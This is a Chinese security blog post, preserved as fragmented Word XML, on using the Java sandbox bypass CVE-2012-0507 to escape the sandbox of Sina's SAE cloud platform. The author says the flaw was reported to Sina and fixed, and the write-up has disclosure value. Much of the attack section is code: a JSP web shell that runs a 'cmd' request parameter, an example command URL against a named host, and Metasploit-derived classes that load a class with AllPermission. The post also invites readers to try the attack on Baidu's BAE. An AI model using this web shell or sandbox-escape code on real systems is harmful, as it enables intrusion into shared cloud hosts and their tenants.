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B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">By kxlzx http://www.inbreak.net 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微博：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http://t.qq.com/javasecurity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br/>
        <w:t>ps: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此漏洞，新浪已修复。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B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摘要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>新浪有云服务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(SAE)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，提供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PHP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等环境，供用户搭建网站，用户都在同一个云上，为了防止恶意用户在云上面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DDOS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，旁注黑掉其他云用户什么的，所以必须做安全限制，至少不允许用户调用某些关键函数。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对这种需求，有完美解决方案的，提供安全沙盒，有了安全沙盒，就限制了很多函数。但是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也有出漏洞的时候，今年新出了漏洞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CVE20120507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，绕过安全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沙箱，新闻上讲，这个漏洞被用来黑苹果电脑。这个漏洞相关的技术，老外有分析文，国内也有分析文，虽然作者还是抱有疑问，但是并没有深究，所以原理方面的东西，就不献丑了。本文的目的，是把这个漏洞换个场景利用起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B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正文</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>如前文所讲，这个漏洞的作用，是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bypass java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的沙盒的，被黑客用来做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by pass applet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的沙盒，这才导致了一些苹果电脑被黑。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Bypass applet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沙盒，主要被应用于，浏览器访问网站时，处理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applet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应用，而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applet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本身，使用了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 xml:space="preserve">security Manage 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和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policy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文件配合，做了沙盒，绕过沙盒后，可以执行任意代码。（如果不绕过，只能执行有限的，无害的代码）。于是有了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exp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，可以反弹连接等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>既然这个漏洞可以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bypass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沙盒，那理论上不应该仅仅是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applet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的沙盒，据作者所知，沙盒还有一个地方可以用，就是传说中的云。比如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GAE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BAE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、以及其他一些允许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网站，但是一大堆限制的云服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>那我们先从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开始（文章发布时，已经修补）吧，目前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还是测试阶段，需要有邀请码，才能使用。我们看看沙盒的限制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B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有沙盒：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比如执行系统命令，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rumtime.exec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函数，是不允许调用的，下面代码测试一下，看看限制信息。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4"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidTr="00DC4B4B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&lt;%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@page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"msf.x.*,java.io.*,java.util.concurrent.atomic.AtomicReferenceArray"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&lt;%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  <w:t>java.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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lang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.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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Process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process 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宋体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  <w:t xml:space="preserve">process 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宋体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Runtime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.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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getRuntime</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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  <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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exec</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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request.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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getParameter</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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"cmd"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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))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ByteArrayOutputStream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resultOutStream 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宋体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ByteArrayOutputStream</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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InputStream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processInStream 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宋体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BufferedInputStream</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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  <w:t>process.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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getInputStream</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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())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BufferedReader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buffer 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java.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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BufferedReader</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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java.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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InputStreamReader</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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processInStream</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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))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num 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宋体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strresult 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""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result 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""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((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strresult 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buffer.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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readLine</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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())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!=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宋体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DC4B4B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lastRenderedPageBreak/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  <w:t xml:space="preserve">result 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+=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strresult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%&gt;&lt;%=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result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&lt;%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  <w:t>processInStream.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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close</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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  <w:t xml:space="preserve">processInStream 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宋体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  <w:t>resultOutStream.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体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close</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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  <w:t xml:space="preserve">resultOutStream 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宋体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 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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B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上传后，我们执行：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br/>
        <w:t>http://1.javasec.sinaapp.com/cmd.jsp?cmd=ls –l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结果页面，显示权限不够：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DC4B4B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5245100" cy="2787650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://www.inbreak.net/wp-content/uploads/2012/07/image00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break.net/wp-content/uploads/2012/07/image00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B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这就是沙盒权限限制的经典提示，无论是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applet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沙盒，还是云沙盒。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看到这个信息，就刚好可以用到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cve20120507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了。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代码原理大家自己翻文章吧，国内有人已经翻译出来了。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br/>
        <w:t>Bypass3.jsp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代码，这个文件负责把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Help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类放入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Help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类的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work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函数中：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="102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0"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidTr="00DC4B4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1029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&lt;%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byte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[]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arrayOfByte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这里是某代码，大家自己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google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能找到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ObjectInputStream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localObjectInputStream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ObjectInputStream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ByteArrayInputStream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arrayOfByte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))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Object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[]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arrayOfObject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Object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[])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Object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[])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localObjectInputStream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  <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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readObject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  <w:t>Help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[]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arrayOfHelp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Help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[])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Help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[])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arrayOfObject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DC4B4B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lastRenderedPageBreak/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  <w:t xml:space="preserve">AtomicReferenceArray localAtomicReferenceArray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AtomicReferenceArray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arrayOfObject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DC4B4B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ClassLoader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localClassLoader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getClass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DC4B4B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getClassLoader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  <w:t>localAtomicReferenceArray.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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, localClassLoader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  <w:t xml:space="preserve">Help localHelp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arrayOfHelp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DC4B4B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Help.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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doWork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localHelp, request.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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getParameter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"cmd"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DC4B4B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toString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())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%&gt;&lt;%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Exception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e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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B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代码调用一个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class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的代码，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Help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类，代码如下：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DC4B4B" w:rsidRPr="00DC4B4B" w:rsidTr="00DC4B4B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String1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"ExpFile"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C4B4B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这个是</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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expfile</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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的类名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localClass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byte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[]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classData1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DC4B4B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54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,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DC4B4B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,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DC4B4B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70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,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DC4B4B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66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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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50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, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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...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这里是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expfile.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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的</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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byte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数组形式内容，直接读取这个文件，输出</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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byte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数组可以得到。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URL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localURL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URL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"file:///"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Certificate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[]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arrayOfCertificate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Certificate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DC4B4B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Permissions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localPermissions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Permissions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localPermissions.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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add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AllPermission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())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ProtectionDomain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localProtectionDomain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ProtectionDomain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CodeSource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localURL, arrayOfCertificate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,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  <w:t>localPermissions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c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paramHelp.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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loadClass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String1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  <w:t xml:space="preserve">localClass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c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Exception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e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  <w:t xml:space="preserve">localClass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paramHelp.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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defineClass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String1, classData1, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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,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  <w:t>classData1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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length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, localProtectionDomain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Field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localField1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localClass.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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getField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"data"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localField1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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localClass, cmd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paramHelp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localClass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!=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  <w:t>localClass.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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newInstance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Field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localFieldresult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localClass.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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getField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"cmdresult"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sresult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localFieldresult.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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localClass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DC4B4B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toString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sresult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DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这段代码中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load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了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expfile.class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byte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数组形式，当然也有人直接读取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class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文件，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expfile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这个类，随便怎么写，都是可以突破沙盒执行的，我的这段代码，也就是个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runtime.exec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，然后拿到执行结果，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所以就不放出了。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这段代码，来自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MSF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框架，其中修改了一部分：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DC4B4B" w:rsidRPr="00DC4B4B" w:rsidTr="00DC4B4B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c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paramHelp.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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loadClass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String1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  <w:t xml:space="preserve">localClass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c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Exception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e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  <w:t xml:space="preserve">localClass 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paramHelp.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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defineClass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String1, classData1, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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,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  <w:t>classData1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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length</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC4B4B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, localProtectionDomain</w:t>
            </w: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DC4B4B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DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B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DC4B4B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DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这是个很重要的技巧，本来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MSF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框架生成的代码，都是在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applet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里执行一次就够了，反弹连接啊，下载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exe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啊什么的，都可以了，不会产生异常。即便下次打开页面，也是新的一次启动执行。但是放在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中执行，一般需要执行多次，而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容器的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不会重启，所以必然会产生异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>原理：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br/>
        <w:t>ClassLoader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（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paramHelp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这个对象继承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）这个类，在执行第二次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defineClass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方法时，会二次加载同一个类（这里是二次加载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expfile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类），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中，是不允许二次加载同一个类的，所以就会报错。为了解决这个问题，只好用了一次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try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和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cache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结构，如果当前的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已经加载过了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expfile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类，就直接用，不需要再次加载同一个类。只有解决这个问题，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MSF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本来用在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applet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上的代码，才能在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中多次执行，否则你看到的结果，必然是，第一次访问页面，执行成功，第二次，报错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>效果如下：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DC4B4B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5137150" cy="1917700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://www.inbreak.net/wp-content/uploads/2012/07/image004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break.net/wp-content/uploads/2012/07/image004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B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这个结果，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bypass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了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上，本来不允许执行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runtime.exec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，并且返回了执行结果。此漏洞已经告诉新浪安全的同学，并且已经修补。升级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JRE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就可以修补这个漏洞，修补后的结果，是返回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null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DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这是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SAE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的执行结果，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BAE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（百度的云）不给力，不给我验证码，所以就不通知他们了，有没有漏洞，大家自己去测试吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4B4B" w:rsidRPr="00DC4B4B" w:rsidRDefault="00DC4B4B" w:rsidP="00DC4B4B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DC4B4B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有不少类似的漏洞，虽然漏洞的公告上，都写明了漏洞的影响，事实上有很多中攻击手段，但是因为其中一种危害特别大，导致人们的都聚焦到这个上面，而忽略了原本公告上给出的重要信息。这个漏洞出来了这么久，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oracle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也早就出了补丁，大家升级本机上的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jre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，但是却忽略了服务器上的影响。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br/>
        <w:t xml:space="preserve">By kxlzx http://www.inbreak.net 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微博：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4B4B">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://t.qq.com/javasecurity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidRDefault="007A5775" w:rsidP="00E413A6">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidSect="00B07B2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112" w:rsidRDefault="00A35112" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A35112" w:rsidRDefault="00A35112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DC4B4B">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>4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DC4B4B">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>4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112" w:rsidRDefault="00A35112" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A35112" w:rsidRDefault="00A35112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A3511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A35112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A3511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220C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B220C"/>
    <w:rsid w:val="009C247C"/>
    <w:rsid w:val="009F2DF3"/>
    <w:rsid w:val="00A2053C"/>
    <w:rsid w:val="00A218A1"/>
    <w:rsid w:val="00A22B26"/>
    <w:rsid w:val="00A35112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DC4B4B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3FCAB39F-66EE-4DC6-A439-3BBFC126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DC4B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C4B4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C4B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4B4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720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6412026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7441215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7422486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break.net/wp-content/uploads/2012/07/image002.jpg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inbreak.net/wp-content/uploads/2012/07/image004.jp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7AFDA-F525-46D9-AA25-59840A82E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2016-12-01T15:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-01T15:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>